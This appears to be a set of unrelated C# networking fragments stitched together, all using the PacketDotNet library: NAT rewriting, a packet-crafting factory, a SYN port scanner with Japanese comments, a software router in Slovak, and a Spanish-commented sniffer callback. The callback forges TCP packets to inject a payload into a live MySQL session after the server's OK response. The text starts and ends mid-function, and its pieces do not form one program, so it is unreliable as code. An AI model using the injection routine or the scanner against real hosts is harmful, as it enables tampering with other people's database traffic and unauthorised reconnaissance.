p_ARP.TargetProtocolAddress = nat_entry.original_source_ip;
packet_changed = true;
}
}
if (packet_changed)
{
data = p.BytesHighPerformance.ActualBytes();
}
return((packet_changed) ? ethernet_packet_type : EthernetPacketType.None);
}
/*
* public EthernetPacketType NAT_incoming_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
* {
* EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
* if (!isIpOrArpPacket(ethernet_packet_type))
* return ethernet_packet_type;
* xbs_nat_entry nat_entry;
* lock (NAT_list)
* {
* if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
* {
* IPAddress sourceIP = getSourceIPFromRawPacketData(ref data, ethernet_packet_type);
* if (sourceIP.Equals(ip_zero))
* return ethernet_packet_type;
* IPAddress destinationIP = getDestinationIPFromRawPacketData(ref data, ethernet_packet_type);
* nat_entry = ip_pool.requestIP( sourceIP, srcMAC );
* if (nat_entry == null)
* {
* xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not nat incoming packet");
* return ethernet_packet_type;
* }
* NAT_list.Add(srcMAC, nat_entry);
#if DEBUG
* xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
#endif
* }
* else
* {
#if DEBUG
* xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
#endif
* }
* }
* replaceSourceIpWithNATSourceIP(ref data, ethernet_packet_type, ref nat_entry);
* if (ethernet_packet_type == EthernetPacketType.IpV4)
* {
* if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast!=null)
* replaceBroadcastIPAddress(ref data, ref nat_entry.natted_broadcast_bytes);
* updateIPChecksums(ref data);
* }
* return ethernet_packet_type;
* }
*/
public EthernetPacketType NAT_incoming_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC, ref Packet p, ref IPv4Packet p_IPV4, ref ARPPacket p_ARP)
{
xbs_nat_entry nat_entry;
EthernetPacketType p_type = ((EthernetPacket)p).Type;
if (p_type != EthernetPacketType.IpV4 && p_type != EthernetPacketType.Arp)
{
return(p_type);
}
lock (NAT_list)
{
if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
{
IPAddress sourceIP = (p_IPV4 != null) ? p_IPV4.SourceAddress : p_ARP.SenderProtocolAddress;
if (sourceIP.Equals(ip_zero))
{
return(p_type);
}
IPAddress destinationIP = (p_IPV4 != null) ? p_IPV4.DestinationAddress : p_ARP.TargetProtocolAddress;
nat_entry = ip_pool.requestIP(sourceIP, srcMAC);
if (nat_entry == null)
{
if (!natIPpoolOverflow_warning_shown)
{
natIPpoolOverflow_warning_shown = true;
xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not NAT incoming packet", xbs_message_sender.NAT, xbs_message_type.WARNING);
}
return(p_type);
}
else
{
natIPpoolOverflow_warning_shown = false;
NAT_list.Add(srcMAC, nat_entry);
#if DEBUG
xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
}
}
else
{
#if DEBUG
xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
}
}
if (p_IPV4 != null)
{
p_IPV4.SourceAddress = nat_entry.natted_source_ip;
if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast != null)
{
p_IPV4.DestinationAddress = nat_entry.natted_broadcast;
}
p_IPV4.UpdateIPChecksum();
if (p_IPV4.Protocol == IPProtocolType.UDP)
{
UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
if (NAT_enablePS3mode)
{
bool ret = PS3_replaceInfoResponse_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip);
if (!ret)
{
ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip, nat_entry.original_source_ip);
}
}
p_UDP.UpdateUDPChecksum();
}
else if (p_IPV4.Protocol == IPProtocolType.TCP)
{
((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
}
}
else
{
p_ARP.SenderProtocolAddress = nat_entry.natted_source_ip;
}
data = p.BytesHighPerformance.ActualBytes();
return(p_type);
}
public static Packet CreatePacket(Param param)
{
Packet ret = null;
//create layer 4
if (param.packetType == Param.PacketType.TCP)
{
TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort);
tcpPacket.AllFlags = param.tcpFlag;
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum();
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.UDP)
{
UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort);
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ipPacket.UpdateIPChecksum();
ret.PayloadPacket = ipPacket;
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.ICMP)
{
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32]));
if (param.type != 0 && param.code != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code));
}
else if (param.type != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256));
}
else
{
icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest;
}
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.PayloadPacket = icmpPacket;
ipPacket.Checksum = ipPacket.CalculateIPChecksum();
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.ICMPv6)
{
ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param);
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.PayloadPacket = icmpv6Packet;
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.IP)
{
if (param.dIP.ToString().Contains("."))
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
ipPacket.UpdateIPChecksum();
}
else
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
//if extension headers were not specified, just put the payload
if (param.ExtentionHeader.Count == 0)
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.PayloadLength = (ushort)param.payload.Length;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
}
else
{
ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret);
}
ret.UpdateCalculatedValues();
}
}
else if (param.packetType == Param.PacketType.EtherType)
{
ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol);
byte[] etherBuffer = (new byte[64]);
var payload = new byte[etherBuffer.Length + (param.payload).Length];
etherBuffer.CopyTo(payload, 0);
(param.payload).CopyTo(payload, etherBuffer.Length);
ret.PayloadData = payload;
ret.UpdateCalculatedValues();
}
return ret;
}
/// <summary>
/// 実行する
/// </summary>
public List <ScanResponse> Execute()
{
var ret = new List <ScanResponse>();
// デバイス変換
var device = _captureDevice as NpcapDevice;
if (device == null)
{
throw new InvalidCastException(string.Format("デバイス {0} を NpcapDevice に変換できません", device.Description));
}
// 送信元IPアドレス
var srcIPAddress = GetIPv4(device);
// SYNスキャン
foreach (var request in _scanRequests)
{
// 送信先MACアドレス
var arp = new ARP(device);
var targetMacAddress = arp.Resolve(request.IPAddress);
if (targetMacAddress == null)
{
ret.Add(new ScanResponse()
{
IPAddress = request.IPAddress,
Port = request.Port,
Status = PortStatus.UnResolved
});
continue;
//throw new InvalidOperationException(string.Format("アドレス {0} を ARP 解決できません", request.IPAddress.ToString()));
}
// TCPヘッダ生成
var tcpPacket = new TcpPacket(1024, request.Port);
tcpPacket.Synchronize = !tcpPacket.Synchronize;
tcpPacket.WindowSize = 4096;
// IPヘッダ生成
var ipPacket = new IPv4Packet(srcIPAddress, request.IPAddress);
// Ehternetヘッダ生成
var ethernetPacket = new EthernetPacket(device.Interface.MacAddress, targetMacAddress, EthernetType.None);
// TCPパケット生成
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.UpdateTcpChecksum();
ethernetPacket.PayloadPacket = ipPacket;
ipPacket.UpdateIPChecksum();
for (int retryCount = 0; retryCount < _maxRetryCount; retryCount++)
{
// オープン
device.Open(DeviceMode.Normal, 1000);
// フィルタセット
device.Filter = "src host " + request.IPAddress + " and src port " + request.Port + " and (tcp[13] & 18 != 0) or (tcp[13] & 4 != 0)";
try
{
// TCPパケット送信
device.SendPacket(ethernetPacket);
// 受信パケット取得
var rawpacket = device.GetNextPacket();
if (rawpacket == null)
{
if ((retryCount + 1) >= _maxRetryCount)
{
ret.Add(new ScanResponse()
{
IPAddress = request.IPAddress,
Port = request.Port,
Status = PortStatus.Timeout
});
break;
}
continue;
}
else
{
// SYN/ACKフラグが立っていたら、open判定
// RSTフラグが立っていたらclosed判定
var response = Packet.ParsePacket(rawpacket.LinkLayerType, rawpacket.Data);
if (response is EthernetPacket eth)
{
var ip = response.Extract <IPPacket>();
if (ip != null)
{
var tcp = response.Extract <TcpPacket>();
if (tcp != null)
{
if (tcp.Acknowledgment && tcp.Synchronize)
{
ret.Add(new ScanResponse()
{
IPAddress = request.IPAddress,
Port = request.Port,
Status = PortStatus.Open
});
}
else if (tcp.Reset)
{
ret.Add(new ScanResponse()
{
IPAddress = request.IPAddress,
Port = request.Port,
Status = PortStatus.Closed
});
}
else
{
ret.Add(new ScanResponse()
{
IPAddress = request.IPAddress,
Port = request.Port,
Status = PortStatus.UnKnown
});
}
}
}
}
break;
}
}
catch (Exception ex)
{
throw new Exception(ex.Message);
}
finally
{
if (device.Opened)
{
device.Close();
}
}
}
}
return(ret);
}
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
{
NetworkSniffer ns = (NetworkSniffer)sender;
IPv4Packet ip = (IPv4Packet)packet.PayloadPacket;
TcpPacket t = (TcpPacket)ip.PayloadPacket;
// Si el paquete recibido es el de respuesta OK del mysql
if (t.PayloadData.SequenceEqual(ResponseOk))
{
Parent = packet;
// Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
ip.Id++;
t.SequenceNumber = LastSequenceId;
t.OptionsCollection.Clear();
t.PayloadData = Payload;
t.Ack = true;
t.Psh = true;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
else
{
// Si el paquete contiene el valor SELECT
string ascii = Encoding.ASCII.GetString(t.PayloadData);
if (Parent != null && ascii.Contains("SELECT"))
{
// Ya no actuamos mas
ns.OnPacket -= Ns_OnPacket;
ip = (IPv4Packet)Parent.PayloadPacket;
t = (TcpPacket)ip.PayloadPacket;
// Enviamos un ACK del paquete recibido, para darle por bueno
t.SequenceNumber = LastSequenceId;
t.AcknowledgmentNumber = t.AcknowledgmentNumber;
t.PayloadData = new byte[] { };
ip.Id++;
t.Ack = true;
t.Psh = false;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
}
}
public void analyzuj(Rozhranie rozhranie, EthernetPacket eth, Packet paket)
{
if (eth.Type.ToString().Equals("Arp"))
{
IPAddress odosielatel_adres = new IPAddress(paket.Bytes.Skip(28).Take(4).ToArray());
IPAddress ciel_adres = new IPAddress(paket.Bytes.Skip(38).Take(4).ToArray());
if (ciel_adres.ToString().Equals("255.255.255.255") || ciel_adres.ToString().Equals(rozhranie.ip_adresa))
{
if (paket.Bytes[21] == 1)
{
arp_reply(eth, rozhranie, odosielatel_adres, ciel_adres); //dosla mi request tak odpovedam
}
else if (paket.Bytes[21] == 2 && !eth.SourceHwAddress.ToString().Equals("02004C4F4F50")) //IGNORUJEM LOOPBACK
{
bool pridaj_arp_zaznam = true;
arp = new Arp(odosielatel_adres.ToString(), eth.SourceHwAddress.ToString(), arp_casovac);
foreach (var zaznam in arp_tabulka)
{
if (zaznam.ip.Equals(arp.ip) && zaznam.mac.Equals(arp.mac))
{
zaznam.casovac = arp_casovac;
pridaj_arp_zaznam = false;
}
if (zaznam.ip.Equals(arp.ip))
{
pridaj_arp_zaznam = false;
}
}
if (pridaj_arp_zaznam)
{
arp_tabulka.Add(arp);
}
}
}
else
{
if (paket.Bytes[21] == 1) // PROXY ARP
{
Smerovaci_zaznam naslo_zaznam = null;
naslo_zaznam = najdi_zaznam_v_smerovacej_tabulke(ciel_adres);
if (naslo_zaznam != null && naslo_zaznam.exit_interface == -1)
{
string via = null;
naslo_zaznam = rekurzivne_prehladanie(naslo_zaznam, ref via);
}
if (naslo_zaznam != null && naslo_zaznam.exit_interface != -1 && (rozhranie.cislo_rozhrania != naslo_zaznam.exit_interface))
{
arp_reply(eth, rozhranie, odosielatel_adres, ciel_adres);
}
}
}
}
else if (eth.Type.ToString().Equals("IpV4"))
{
if ((--paket.Bytes[22]) > 0)
{
IPAddress odosielatel_address = new IPAddress(paket.Bytes.Skip(26).Take(4).ToArray());
IPAddress ciel_adres = new IPAddress(paket.Bytes.Skip(30).Take(4).ToArray());
Smerovaci_zaznam smerovaci_zaznam = null;
string via = null;
IPv4Packet ip_pak = (IPv4Packet)eth.PayloadPacket;
ip_pak.UpdateIPChecksum();
if ((ciel_adres.ToString() == rozhranie1.ip_adresa || ciel_adres.ToString() == rozhranie2.ip_adresa) && (int)eth.Bytes[23] == 1)
{
ICMPv4Packet ping = (ICMPv4Packet)ip_pak.PayloadPacket;
if ((int)eth.Bytes[34] == 8)
{
ping.Checksum = 0;
ping.TypeCode = ICMPv4TypeCodes.EchoReply;
byte[] bytes = BitConverter.GetBytes(GetCrc(ping.Bytes));
Array.Reverse(bytes);
ushort result = BitConverter.ToUInt16(bytes, 0);
ping.Checksum = result;
ip_pak.SourceAddress = ciel_adres;
ip_pak.DestinationAddress = odosielatel_address;
ip_pak.PayloadPacket = ping;
ip_pak.UpdateIPChecksum();
eth.PayloadPacket = ip_pak;
smerovaci_zaznam = najdi_zaznam_v_smerovacej_tabulke(odosielatel_address);
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface == -1)
{
smerovaci_zaznam = rekurzivne_prehladanie(smerovaci_zaznam, ref via);
}
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface != -1 && smerovaci_zaznam.next_hop != "X")
{
via = smerovaci_zaznam.next_hop;
}
if (smerovaci_zaznam != null)
{
if (smerovaci_zaznam.exit_interface == 2)
{
rozhranie = rozhranie2;
}
if (smerovaci_zaznam.exit_interface == 1)
{
rozhranie = rozhranie1;
}
Thread posielanie = new Thread(() => preposli(rozhranie, eth, smerovaci_zaznam, via, odosielatel_address));
posielanie.Start();
}
}
else if ((int)eth.Bytes[34] == 0)
{
if (zapis_ping)
{
// main_view.vypis("!", 99);
main_view.lbl_ping += "!";
zapis_ping = false;
}
}
}
else if ((ciel_adres.ToString() == rozhranie.ip_adresa || ciel_adres.ToString() == "224.0.0.9") && ((int)eth.Bytes[43] == 2))
{
spracuj_rip(eth, paket, rozhranie, odosielatel_address);
}
else
{
smerovaci_zaznam = najdi_zaznam_v_smerovacej_tabulke(ciel_adres);
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface == -1)
{
smerovaci_zaznam = rekurzivne_prehladanie(smerovaci_zaznam, ref via);
}
if (smerovaci_zaznam != null && smerovaci_zaznam.exit_interface != -1 && smerovaci_zaznam.next_hop != "X")
{
via = smerovaci_zaznam.next_hop;
}
if (smerovaci_zaznam != null)
{
if (smerovaci_zaznam.exit_interface == 1)
{
rozhranie = rozhranie1;
}
if (smerovaci_zaznam.exit_interface == 2)
{
rozhranie = rozhranie2;
}
Thread posielanie = new Thread(() => preposli(rozhranie, eth, smerovaci_zaznam, via, ciel_adres));
posielanie.Start();
}
}
}
}
if (zastav_vlakno)
{
rozhranie.adapter.Close();
}
}
